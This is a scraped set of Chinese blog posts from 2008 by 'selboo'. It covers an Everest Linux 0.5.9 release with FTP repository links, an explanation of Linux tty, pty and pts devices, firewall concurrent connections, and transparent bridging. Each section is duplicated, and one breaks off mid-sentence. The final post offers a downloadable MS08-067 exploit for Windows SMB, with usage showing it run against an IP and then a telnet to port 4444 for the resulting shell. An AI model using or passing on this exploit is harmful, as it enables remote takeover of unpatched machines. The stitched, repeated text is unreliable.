Everest 0.5.9开发者版本发布
[ 2008/11/03 18:47 | by selboo ]
0.5.9是开发者版本,后续稳定版本为0.6,重要组件如下:
kernel-2.6.26.5
glibc-2.8
gcc-4.3.2
python-2.6
ruby-1.8.6p287
perl-5.10
xorg 7.4 aka xorg-server 1.5.1
wine-1.1.4
kde-3.5.10
qt3 3.3.8
qt4 4.4.3
wxGTK 2.8.9
wxPython 2.8.9.1
gtk-2.14.3
gnome platform 2.24
mono-2.0
vim-7.2
firefox-3.0.3
thunderbird-2.0.0.17
emacs 23cvs
compiz 0.7.8
gimp 2.6.0
OpenOffice 3.0.0rc4(en_US)
xfce 4.4.2
......
这些组件的版本足够让一个Linux用户或者开发者high一把了。
ISO以及硬盘安装vmlinuz/initrd.img位置如下,光盘尺寸为640M.
ftp://www.linux-ren.org/pub/everest/0.5.9/iso/
yum仓库定义(放入/etc/yum.repos.d目录):
ftp://www.linux-ren.org/pub/everest/0.5.9/0.5.9.repo
apt仓库定义(放入/etc/apt/sources.list.d目录):
ftp://www.linux-ren.org/pub/everest/0.5.9/0.5.9.list
仓库中有大量应用程序、工具软件和Linux原生游戏,可根据需要使用上述两种方式进行安装。
kernel-2.6.26.5
glibc-2.8
gcc-4.3.2
python-2.6
ruby-1.8.6p287
perl-5.10
xorg 7.4 aka xorg-server 1.5.1
wine-1.1.4
kde-3.5.10
qt3 3.3.8
qt4 4.4.3
wxGTK 2.8.9
wxPython 2.8.9.1
gtk-2.14.3
gnome platform 2.24
mono-2.0
vim-7.2
firefox-3.0.3
thunderbird-2.0.0.17
emacs 23cvs
compiz 0.7.8
gimp 2.6.0
OpenOffice 3.0.0rc4(en_US)
xfce 4.4.2
......
这些组件的版本足够让一个Linux用户或者开发者high一把了。
ISO以及硬盘安装vmlinuz/initrd.img位置如下,光盘尺寸为640M.
ftp://www.linux-ren.org/pub/everest/0.5.9/iso/
yum仓库定义(放入/etc/yum.repos.d目录):
ftp://www.linux-ren.org/pub/everest/0.5.9/0.5.9.repo
apt仓库定义(放入/etc/apt/sources.list.d目录):
ftp://www.linux-ren.org/pub/everest/0.5.9/0.5.9.list
仓库中有大量应用程序、工具软件和Linux原生游戏,可根据需要使用上述两种方式进行安装。
Linux中tty、pty、pts的概念区别
[ 2008/11/03 18:41 | by selboo ]
基本概念:
1> tty(终端设备的统称):
tty一词源于Teletypes,或者teletypewriters,原来指的是电传打字机,是通过串行线用打印机键盘通过阅读和发送信息的东西,后来这东西被键盘与显示器取代,所以现在叫终端比较合适。
终端是一种字符型设备,它有多种类型,通常使用tty来简称各种类型的终端设备。
2> pty(虚拟终端):
但是如果我们远程telnet到主机或使用xterm时不也需要一个终端交互么?是的,这就是虚拟终端pty(pseudo-tty)
3> pts/ptmx(pts/ptmx结合使用,进而实现pty):
pts(pseudo-terminal slave)是pty的实现方法,与ptmx(pseudo-terminal master)配合使用实现pty。
Linux终端:
在Linux系统的设备特殊文件目录/dev/下,终端特殊设备文件一般有以下几种:
1、串行端口终端(/dev/ttySn)
串行端口终端(Serial Port Terminal)是使用计算机串行端口连接的终端设备。计算机把每个串行端口都看作是一个字符设备。有段时间这些串行端口设备通常被称为终端设备,因为那时它的最大用途就是用来连接终端。这些串行端口所对应的设备名称是/dev/tts/0(或/dev/ttyS0), /dev/tts/1(或/dev/ttyS1)等,设备号分别是(4,0), (4,1)等,分别对应于DOS系统下的COM1、COM2等。若要向一个端口发送数据,可以在命令行上把标准输出重定向到这些特殊文件名上即可。例如,在命令行提示符下键入:echo test > /dev/ttyS1会把单词”test”发送到连接在ttyS1(COM2)端口的设备上。可接串口来实验。
2、伪终端(/dev/pty/)
伪终端(Pseudo Terminal)是成对的逻辑终端设备(即master和slave设备, 对master的操作会反映到slave上)。
例如/dev/ptyp3和/dev/ttyp3(或者在设备文件系统中分别是/dev/pty/m3和 /dev/pty/s3)。它们与实际物理设备并不直接相关。如果一个程序把ptyp3(master设备)看作是一个串行端口设备,则它对该端口的读/ 写操作会反映在该逻辑终端设备对应的另一个ttyp3(slave设备)上面。而ttyp3则是另一个程序用于读写操作的逻辑设备。
这样,两个程序就可以通过这种逻辑设备进行互相交流,而其中一个使用ttyp3的程序则认为自己正在与一个串行端口进行通信。这很象是逻辑设备对之间的管道操作。对于ttyp3(s3),任何设计成使用一个串行端口设备的程序都可以使用该逻辑设备。但对于使用ptyp3的程序,则需要专门设计来使用 ptyp3(m3)逻辑设备。
例如,如果某人在网上使用telnet程序连接到你的计算机上,则telnet程序就可能会开始连接到设备 ptyp2(m2)上(一个伪终端端口上)。此时一个getty程序就应该运行在对应的ttyp2(s2)端口上。当telnet从远端获取了一个字符时,该字符就会通过m2、s2传递给 getty程序,而getty程序就会通过s2、m2和telnet程序往网络上返回”login:”字符串信息。这样,登录程序与telnet程序就通过“伪终端”进行通信。通过使用适当的软件,就可以把两个甚至多个伪终端设备连接到同一个物理串行端口上。
在使用设备文件系统 (device filesystem)之前,为了得到大量的伪终端设备特殊文件,使用了比较复杂的文件名命名方式。因为只存在16个ttyp(ttyp0—ttypf) 的设备文件,为了得到更多的逻辑设备对,就使用了象q、r、s等字符来代替p。例如,ttys8和ptys8就是一个伪终端设备对。不过这种命名方式目前仍然在RedHat等Linux系统中使用着。
但Linux系统上的Unix98并不使用上述方法,而使用了”pty master”方式,例如/dev/ptm3。它的对应端则会被自动地创建成/dev/pts/3。这样就可以在需要时提供一个pty伪终端。目录 /dev/pts是一个类型为devpts的文件系统,并且可以在被加载文件系统列表中看到。虽然“文件”/dev/pts/3看上去是设备文件系统中的一项,但其实它完全是一种不同的文件系统。
即: TELNET ---> TTYP3(S3: slave) ---> PTYP3(M3: master) ---> GETTY
=========================================================================
实验:
1、在X下打开一个或N个终端窗口
2、#ls /dev/pt*
3、关闭这个X下的终端窗口,再次运行;比较两次输出信息就明白了。
在RHEL4环境下: 输出为/dev/ptmx /dev/pts/1存在一(master)对多(slave)的情况
=========================================================================
3、控制终端(/dev/tty)
如果当前进程有控制终端(Controlling Terminal)的话,那么/dev/tty就是当前进程的控制终端的设备特殊文件。可以使用命令”ps –ax”来查看进程与哪个控制终端相连。对于你登录的shell,/dev/tty就是你使用的终端,设备号是(5,0)。使用命令”tty”可以查看它具体对应哪个实际终端设备。/dev/tty有些类似于到实际所使用终端设备的一个联接。
4、控制台终端(/dev/ttyn, /dev/console)
在Linux 系统中,计算机显示器通常被称为控制台终端 (Console)。它仿真了类型为Linux的一种终端(TERM=Linux),并且有一些设备特殊文件与之相关联:tty0、tty1、tty2 等。当你在控制台上登录时,使用的是tty1。使用Alt+[F1—F6]组合键时,我们就可以切换到tty2、tty3等上面去。tty1–tty6等称为虚拟终端,而tty0则是当前所使用虚拟终端的一个别名,系统所产生的信息会发送到该终端上(这时也叫控制台终端)。因此不管当前正在使用哪个虚拟终端,系统信息都会发送到控制台终端上。你可以登录到不同的虚拟终端上去,因而可以让系统同时有几个不同的会话期存在。只有系统或超级用户root可以向 /dev/tty0进行写操作 即下例:
1、# tty(查看当前TTY)
/dev/tty1
2、#echo "test tty0" > /dev/tty0
test tty0
5 虚拟终端(/dev/pts/n)
在Xwindows模式下的伪终端.
6 其它类型
Linux系统中还针对很多不同的字符设备存在有很多其它种类的终端设备特殊文件。例如针对ISDN设备的/dev/ttyIn终端设备等。这里不再赘述。
FAQ: 终端和控制台
RROM:http://blog.footoo.org/?p=73
Posted on Tuesday, November 28th, 2006 by CLIFF
吴晋 (cliffwoo@gmail.com)
FoOTOo OpenSource Lab
由于在很多朋友对终端的概念一直不是很清楚,因此写了这个FAQ,希望能够帮助大家理解这些概念。不妥之处,还请大家来信指出。
Q:/dev/console 是什么?
A:/dev/console即控制台,是与操作系统交互的设备,系统将一些信息直接输出到控制台上。目前只有在单用户模式下,才允许用户登录控制台。
Q:/dev/tty是什么?
A:tty设备包括虚拟控制台,串口以及伪终端设备。
/dev/tty代表当前tty设备,在当前的终端中输入 echo “hello” > /dev/tty ,都会直接显示在当前的终端中。
Q:/dev/ttyS*是什么?
A:/dev/ttyS*是串行终端设备。
Q:/dev/pty*是什么?
A:/dev/pty*即伪终端,所谓伪终端是逻辑上的终端设备,多用于模拟终端程序。例如,我们在X Window下打开的终端,以及我们在Windows使用telnet 或ssh等方式登录Linux主机,此时均在使用pty设备(准确的说在使用pty从设备)。
Q:/dev/tty0与/dev/tty1 …/dev/tty63是什么?它们之间有什么区别?
A:/dev/tty0代表当前虚拟控制台,而/dev/tty1等代表第一个虚拟控制台,例如当使用ALT+F2进行切换时,系统的虚拟控制台为/dev/tty2 ,当前的控制台则指向/dev/tty2
Q:如何确定当前所在的终端(或控制台)?
A:使用tty命令可以确定当前的终端或者控制台。
Q:/dev/console是到/dev/tty0的符号链接吗?
A: 目前的大多数文本中都称/dev/console是到/dev/tty0的链接(包括《Linux内核源代码情景分析》),但是这样说是不确切的。根据内核文档,在2.1.71之前,/dev/console根据不同系统的设定可以链接到/dev/tty0或者其他tty*上,在2.1.71版本之后则完全由内核控制。目前,只有在单用户模式下可以登录/dev/console(可以在单用户模式下输入tty命令进行确认)。
Q:/dev/tty0与/dev/fb*有什么区别?
A: 在Framebuffer设备没有启用的系统中,可以使用/dev/tty0访问显卡。
Q:关于终端和控制台的区别可以参考哪些文本
A: 可以参考内核文档中的 Documents/devices.txt 中关于”TERMINAL DEVICES” 的章节。另外,《Linux内核源代码情景分析》的8.7节 以及《Operating Systems : Design and Implementation》中的3.9节(第3版中为3.8节)都对终端设备的概念和历史做了很好的介绍。另外在《Modern Operating system》中也有对终端设备的介绍,由于与《Operating Systems : Design and Implementation》的作者相同,所以文本内容也大致相同。需要注意的一点是《Operating Systems : Design and Implementation》中将终端设备分为3类,而《Modern Operating system》将终端硬件设备分为2类,差别在于前者将 X Terminal作为一个类别。
PS:
只有2410的2.6才叫ttySAC0,9200等的还是叫ttyS0
1> tty(终端设备的统称):
tty一词源于Teletypes,或者teletypewriters,原来指的是电传打字机,是通过串行线用打印机键盘通过阅读和发送信息的东西,后来这东西被键盘与显示器取代,所以现在叫终端比较合适。
终端是一种字符型设备,它有多种类型,通常使用tty来简称各种类型的终端设备。
2> pty(虚拟终端):
但是如果我们远程telnet到主机或使用xterm时不也需要一个终端交互么?是的,这就是虚拟终端pty(pseudo-tty)
3> pts/ptmx(pts/ptmx结合使用,进而实现pty):
pts(pseudo-terminal slave)是pty的实现方法,与ptmx(pseudo-terminal master)配合使用实现pty。
Linux终端:
在Linux系统的设备特殊文件目录/dev/下,终端特殊设备文件一般有以下几种:
1、串行端口终端(/dev/ttySn)
串行端口终端(Serial Port Terminal)是使用计算机串行端口连接的终端设备。计算机把每个串行端口都看作是一个字符设备。有段时间这些串行端口设备通常被称为终端设备,因为那时它的最大用途就是用来连接终端。这些串行端口所对应的设备名称是/dev/tts/0(或/dev/ttyS0), /dev/tts/1(或/dev/ttyS1)等,设备号分别是(4,0), (4,1)等,分别对应于DOS系统下的COM1、COM2等。若要向一个端口发送数据,可以在命令行上把标准输出重定向到这些特殊文件名上即可。例如,在命令行提示符下键入:echo test > /dev/ttyS1会把单词”test”发送到连接在ttyS1(COM2)端口的设备上。可接串口来实验。
2、伪终端(/dev/pty/)
伪终端(Pseudo Terminal)是成对的逻辑终端设备(即master和slave设备, 对master的操作会反映到slave上)。
例如/dev/ptyp3和/dev/ttyp3(或者在设备文件系统中分别是/dev/pty/m3和 /dev/pty/s3)。它们与实际物理设备并不直接相关。如果一个程序把ptyp3(master设备)看作是一个串行端口设备,则它对该端口的读/ 写操作会反映在该逻辑终端设备对应的另一个ttyp3(slave设备)上面。而ttyp3则是另一个程序用于读写操作的逻辑设备。
这样,两个程序就可以通过这种逻辑设备进行互相交流,而其中一个使用ttyp3的程序则认为自己正在与一个串行端口进行通信。这很象是逻辑设备对之间的管道操作。对于ttyp3(s3),任何设计成使用一个串行端口设备的程序都可以使用该逻辑设备。但对于使用ptyp3的程序,则需要专门设计来使用 ptyp3(m3)逻辑设备。
例如,如果某人在网上使用telnet程序连接到你的计算机上,则telnet程序就可能会开始连接到设备 ptyp2(m2)上(一个伪终端端口上)。此时一个getty程序就应该运行在对应的ttyp2(s2)端口上。当telnet从远端获取了一个字符时,该字符就会通过m2、s2传递给 getty程序,而getty程序就会通过s2、m2和telnet程序往网络上返回”login:”字符串信息。这样,登录程序与telnet程序就通过“伪终端”进行通信。通过使用适当的软件,就可以把两个甚至多个伪终端设备连接到同一个物理串行端口上。
在使用设备文件系统 (device filesystem)之前,为了得到大量的伪终端设备特殊文件,使用了比较复杂的文件名命名方式。因为只存在16个ttyp(ttyp0—ttypf) 的设备文件,为了得到更多的逻辑设备对,就使用了象q、r、s等字符来代替p。例如,ttys8和ptys8就是一个伪终端设备对。不过这种命名方式目前仍然在RedHat等Linux系统中使用着。
但Linux系统上的Unix98并不使用上述方法,而使用了”pty master”方式,例如/dev/ptm3。它的对应端则会被自动地创建成/dev/pts/3。这样就可以在需要时提供一个pty伪终端。目录 /dev/pts是一个类型为devpts的文件系统,并且可以在被加载文件系统列表中看到。虽然“文件”/dev/pts/3看上去是设备文件系统中的一项,但其实它完全是一种不同的文件系统。
即: TELNET ---> TTYP3(S3: slave) ---> PTYP3(M3: master) ---> GETTY
=========================================================================
实验:
1、在X下打开一个或N个终端窗口
2、#ls /dev/pt*
3、关闭这个X下的终端窗口,再次运行;比较两次输出信息就明白了。
在RHEL4环境下: 输出为/dev/ptmx /dev/pts/1存在一(master)对多(slave)的情况
=========================================================================
3、控制终端(/dev/tty)
如果当前进程有控制终端(Controlling Terminal)的话,那么/dev/tty就是当前进程的控制终端的设备特殊文件。可以使用命令”ps –ax”来查看进程与哪个控制终端相连。对于你登录的shell,/dev/tty就是你使用的终端,设备号是(5,0)。使用命令”tty”可以查看它具体对应哪个实际终端设备。/dev/tty有些类似于到实际所使用终端设备的一个联接。
4、控制台终端(/dev/ttyn, /dev/console)
在Linux 系统中,计算机显示器通常被称为控制台终端 (Console)。它仿真了类型为Linux的一种终端(TERM=Linux),并且有一些设备特殊文件与之相关联:tty0、tty1、tty2 等。当你在控制台上登录时,使用的是tty1。使用Alt+[F1—F6]组合键时,我们就可以切换到tty2、tty3等上面去。tty1–tty6等称为虚拟终端,而tty0则是当前所使用虚拟终端的一个别名,系统所产生的信息会发送到该终端上(这时也叫控制台终端)。因此不管当前正在使用哪个虚拟终端,系统信息都会发送到控制台终端上。你可以登录到不同的虚拟终端上去,因而可以让系统同时有几个不同的会话期存在。只有系统或超级用户root可以向 /dev/tty0进行写操作 即下例:
1、# tty(查看当前TTY)
/dev/tty1
2、#echo "test tty0" > /dev/tty0
test tty0
5 虚拟终端(/dev/pts/n)
在Xwindows模式下的伪终端.
6 其它类型
Linux系统中还针对很多不同的字符设备存在有很多其它种类的终端设备特殊文件。例如针对ISDN设备的/dev/ttyIn终端设备等。这里不再赘述。
FAQ: 终端和控制台
RROM:http://blog.footoo.org/?p=73
Posted on Tuesday, November 28th, 2006 by CLIFF
吴晋 (cliffwoo@gmail.com)
FoOTOo OpenSource Lab
由于在很多朋友对终端的概念一直不是很清楚,因此写了这个FAQ,希望能够帮助大家理解这些概念。不妥之处,还请大家来信指出。
Q:/dev/console 是什么?
A:/dev/console即控制台,是与操作系统交互的设备,系统将一些信息直接输出到控制台上。目前只有在单用户模式下,才允许用户登录控制台。
Q:/dev/tty是什么?
A:tty设备包括虚拟控制台,串口以及伪终端设备。
/dev/tty代表当前tty设备,在当前的终端中输入 echo “hello” > /dev/tty ,都会直接显示在当前的终端中。
Q:/dev/ttyS*是什么?
A:/dev/ttyS*是串行终端设备。
Q:/dev/pty*是什么?
A:/dev/pty*即伪终端,所谓伪终端是逻辑上的终端设备,多用于模拟终端程序。例如,我们在X Window下打开的终端,以及我们在Windows使用telnet 或ssh等方式登录Linux主机,此时均在使用pty设备(准确的说在使用pty从设备)。
Q:/dev/tty0与/dev/tty1 …/dev/tty63是什么?它们之间有什么区别?
A:/dev/tty0代表当前虚拟控制台,而/dev/tty1等代表第一个虚拟控制台,例如当使用ALT+F2进行切换时,系统的虚拟控制台为/dev/tty2 ,当前的控制台则指向/dev/tty2
Q:如何确定当前所在的终端(或控制台)?
A:使用tty命令可以确定当前的终端或者控制台。
Q:/dev/console是到/dev/tty0的符号链接吗?
A: 目前的大多数文本中都称/dev/console是到/dev/tty0的链接(包括《Linux内核源代码情景分析》),但是这样说是不确切的。根据内核文档,在2.1.71之前,/dev/console根据不同系统的设定可以链接到/dev/tty0或者其他tty*上,在2.1.71版本之后则完全由内核控制。目前,只有在单用户模式下可以登录/dev/console(可以在单用户模式下输入tty命令进行确认)。
Q:/dev/tty0与/dev/fb*有什么区别?
A: 在Framebuffer设备没有启用的系统中,可以使用/dev/tty0访问显卡。
Q:关于终端和控制台的区别可以参考哪些文本
A: 可以参考内核文档中的 Documents/devices.txt 中关于”TERMINAL DEVICES” 的章节。另外,《Linux内核源代码情景分析》的8.7节 以及《Operating Systems : Design and Implementation》中的3.9节(第3版中为3.8节)都对终端设备的概念和历史做了很好的介绍。另外在《Modern Operating system》中也有对终端设备的介绍,由于与《Operating Systems : Design and Implementation》的作者相同,所以文本内容也大致相同。需要注意的一点是《Operating Systems : Design and Implementation》中将终端设备分为3类,而《Modern Operating system》将终端硬件设备分为2类,差别在于前者将 X Terminal作为一个类别。
PS:
只有2410的2.6才叫ttySAC0,9200等的还是叫ttyS0
并发连接数是指防火墙或代理服务器对其业务信息流的处理能力,是防火墙能够同时处理的点对点连接的最大数目,它反映出防火墙设备对多个连接的访问控制能力和连接状态跟踪能力,这个参数的大小直接影响到防火墙所能支持的最大信息点数。
并发连接数是衡量防火墙性能的一个重要指标。在目前市面上常见防火墙设备的说明书中大家可以看到,从低端设备的500、1000个并发连接,一直到高端设备的数万、数十万并发连接,存在着好几个数量级的差异。那么,并发连接数究竟是一个什么概念呢?它的大小会对用户的日常使用产生什么影响呢?要了解并发连接数,首先需要明白一个概念,那就是“会话”。这个“会话”可不是我们平时的谈话,但是可以用平时的谈话来理解,两个人在谈话时,你一句,我一句,一问一答,我们把它称为一次对话,或者叫会话。同样,在我们用电脑工作时,打开的一个窗口或一个Web页面,我们也可以把它叫做一个“会话”,扩展到一个局域网里面,所有用户要通过防火墙上网,要打开很多个窗口或Web页面发(即会话),那么,这个防火墙,所能处理的最大会话数量,就是“并发连接数”。
像路由器的路由表存放路由信息一样,防火
并发连接数是衡量防火墙性能的一个重要指标。在目前市面上常见防火墙设备的说明书中大家可以看到,从低端设备的500、1000个并发连接,一直到高端设备的数万、数十万并发连接,存在着好几个数量级的差异。那么,并发连接数究竟是一个什么概念呢?它的大小会对用户的日常使用产生什么影响呢?要了解并发连接数,首先需要明白一个概念,那就是“会话”。这个“会话”可不是我们平时的谈话,但是可以用平时的谈话来理解,两个人在谈话时,你一句,我一句,一问一答,我们把它称为一次对话,或者叫会话。同样,在我们用电脑工作时,打开的一个窗口或一个Web页面,我们也可以把它叫做一个“会话”,扩展到一个局域网里面,所有用户要通过防火墙上网,要打开很多个窗口或Web页面发(即会话),那么,这个防火墙,所能处理的最大会话数量,就是“并发连接数”。
像路由器的路由表存放路由信息一样,防火
有句俗语说的好:“如果不能路由,就进行桥接”。桥接可以互联LAN,在第2层上形成一个单一的大型逻辑网络。桥接还可以将一个拥挤的以太网段分割成两部分,原来网段上的流量被分割成两个较小的流量,因此减少了发生冲撞的机会。什么时候选择桥接而不是路由呢?为了回答这个问题,首先需要了解目前网络中运行的是哪些协议以及这些协议是否是可路由的。可路由的协议可以被路由或桥接。而不可路由的协议只能被桥接。IP、IPX、Apple Talk、DECnet、Banyan VINES和ISO CLNS都是可路由的协议,而LAT、MOP、NetBIOS和SNA是不可路由的。路由器主要作用于O S I参考模型的网络层上,并使用逻辑网络地址来进行路由选择。这些网络地址也可以将网络分割成更小的第三层逻辑单元,由此来限制本地广播。而桥接作用于数据链路层,使用M A C地址作出转发决定。桥接的网络位于一个单独的逻辑网络地址空间之内。因此,桥接有助于保存网络层地址。因为只有一个逻辑网络存在,网桥必须将本地广播转发到除源网段外的所有连接的网段。
本章其余部分将主要介绍透明桥接。透明桥接通常用于将两个或更多的Ethernet II或IEEE802.3网络连接或扩展到一个单一的逻辑LAN。
1.2 透明桥接概述
透明桥接主要用于以太网环境中。透明网桥不更改数据帧的内容,也不作为数据帧的源或目的地,它使得由它连接起来的各个网段看起来像是在一条电缆上。在桥接的LAN中,在各个终端站点之间传送的帧中,源和目的地址字段携带了源和目的终端的M A C地址信息。至于网桥的M A C地址或其他的标识信息,并不会被放置在数据帧中在各个终端站点之间传送。
操作模式
学习
转发
过滤
阻塞
1. 学习模式
动态入口及其相关的端口保存在一个桥接表(也称为过滤数据库)中。从表的入口被创建或最后一次更新之后,如果经过了一个指定的时间,这些入口将自动被删除。这个寿命定时器使得终端站点从桥接LAN的一部分移到另一部分时,它依然可以接收到帧。IEEE 802.1D委员会推荐的缺省寿命值为300s,并且范围从10~1000000s。
2. 转发模式
当网桥接收到帧时,它搜索自己的桥接表,确定帧的目的地址是否和网桥的任一端口相关联(除了接收该帧的端口)。如果表中包含了这样一个入口,那么网桥将按照数据库中指定的端口将帧转发出去。但是,如果在表中没有找到源地址和目的地址,那么网桥将该源地址和它相关的端口写入到表中。然后向所有的端口转发该帧,除了接收它的端口之外,这个过程叫做散发。如果从目的地得到一个响应,那么网桥将响应的源地址(也就是最初的目的地址)和它相关的端口加入到桥接表中。这样,网桥就可以将后续的帧从指定的端口转发出去。注意如果接收端口和发送端口都处于转发状态,那么网桥只能将帧转发到其他的桥接端口。
3. 过滤模式
如果帧的源地址和目的地址在桥接表中与同一个端口相关联(即两个终端站点位于同一个网段上),那么网桥将不会转发该帧。这种情况叫做过滤,网桥将忽略这样的帧,以节省带宽。但是,如果源和目的站点位于同一个网段,而网桥并不知道该目的地址,那么网桥将散发以学习该地址。当目的站点响应时,网桥即可以将响应的源地址和它相关的端口加入到桥接表中。从此以后,网桥可以过滤这两个站点之间的帧。
4. 环路避免
当两个桥接网络之间存在多条路径时,将会形成一个桥接环。桥接环就像一把双刃剑。它能够提供冗余性,但是如果桥接网络中任意两个站点之间都存在多条路径,那么透明桥接将失败。因此,一个使用生成树算法的网桥到网桥协议可以保持环路的优点,同时又解决了它的问题。
5. 生成树算法
生成树算法( S TA)是由数字设备公司( D E C)开发的,后来成为了IEEE 802.1D的基础。注意D E C的算法与IEEE 802.1D算法并不是兼容的。本章将使用IEEE 802.1D算法作为标准的桥接协议。
本章其余部分将主要介绍透明桥接。透明桥接通常用于将两个或更多的Ethernet II或IEEE802.3网络连接或扩展到一个单一的逻辑LAN。
1.2 透明桥接概述
透明桥接主要用于以太网环境中。透明网桥不更改数据帧的内容,也不作为数据帧的源或目的地,它使得由它连接起来的各个网段看起来像是在一条电缆上。在桥接的LAN中,在各个终端站点之间传送的帧中,源和目的地址字段携带了源和目的终端的M A C地址信息。至于网桥的M A C地址或其他的标识信息,并不会被放置在数据帧中在各个终端站点之间传送。
操作模式
学习
转发
过滤
阻塞
1. 学习模式
动态入口及其相关的端口保存在一个桥接表(也称为过滤数据库)中。从表的入口被创建或最后一次更新之后,如果经过了一个指定的时间,这些入口将自动被删除。这个寿命定时器使得终端站点从桥接LAN的一部分移到另一部分时,它依然可以接收到帧。IEEE 802.1D委员会推荐的缺省寿命值为300s,并且范围从10~1000000s。
2. 转发模式
当网桥接收到帧时,它搜索自己的桥接表,确定帧的目的地址是否和网桥的任一端口相关联(除了接收该帧的端口)。如果表中包含了这样一个入口,那么网桥将按照数据库中指定的端口将帧转发出去。但是,如果在表中没有找到源地址和目的地址,那么网桥将该源地址和它相关的端口写入到表中。然后向所有的端口转发该帧,除了接收它的端口之外,这个过程叫做散发。如果从目的地得到一个响应,那么网桥将响应的源地址(也就是最初的目的地址)和它相关的端口加入到桥接表中。这样,网桥就可以将后续的帧从指定的端口转发出去。注意如果接收端口和发送端口都处于转发状态,那么网桥只能将帧转发到其他的桥接端口。
3. 过滤模式
如果帧的源地址和目的地址在桥接表中与同一个端口相关联(即两个终端站点位于同一个网段上),那么网桥将不会转发该帧。这种情况叫做过滤,网桥将忽略这样的帧,以节省带宽。但是,如果源和目的站点位于同一个网段,而网桥并不知道该目的地址,那么网桥将散发以学习该地址。当目的站点响应时,网桥即可以将响应的源地址和它相关的端口加入到桥接表中。从此以后,网桥可以过滤这两个站点之间的帧。
4. 环路避免
当两个桥接网络之间存在多条路径时,将会形成一个桥接环。桥接环就像一把双刃剑。它能够提供冗余性,但是如果桥接网络中任意两个站点之间都存在多条路径,那么透明桥接将失败。因此,一个使用生成树算法的网桥到网桥协议可以保持环路的优点,同时又解决了它的问题。
5. 生成树算法
生成树算法( S TA)是由数字设备公司( D E C)开发的,后来成为了IEEE 802.1D的基础。注意D E C的算法与IEEE 802.1D算法并不是兼容的。本章将使用IEEE 802.1D算法作为标准的桥接协议。
Windows下MS08-067.exe
[ 2008/11/03 18:30 | by selboo ]
使用方法:
C:\>MS08-067.exe 192.0.0.150
MS08-067 Exploit for CN by EMM@ph4nt0m.org
SMB Connect OK!
Send Payload Over!
C:\>telnet 192.0.0.150 4444
下载地址:
下载文件 (已下载 515 次)
Microsoft 安全公告 MS08-067 - 严重
C:\>MS08-067.exe 192.0.0.150
MS08-067 Exploit for CN by EMM@ph4nt0m.org
SMB Connect OK!
Send Payload Over!
C:\>telnet 192.0.0.150 4444
下载地址:
下载文件 (已下载 515 次)Microsoft 安全公告 MS08-067 - 严重
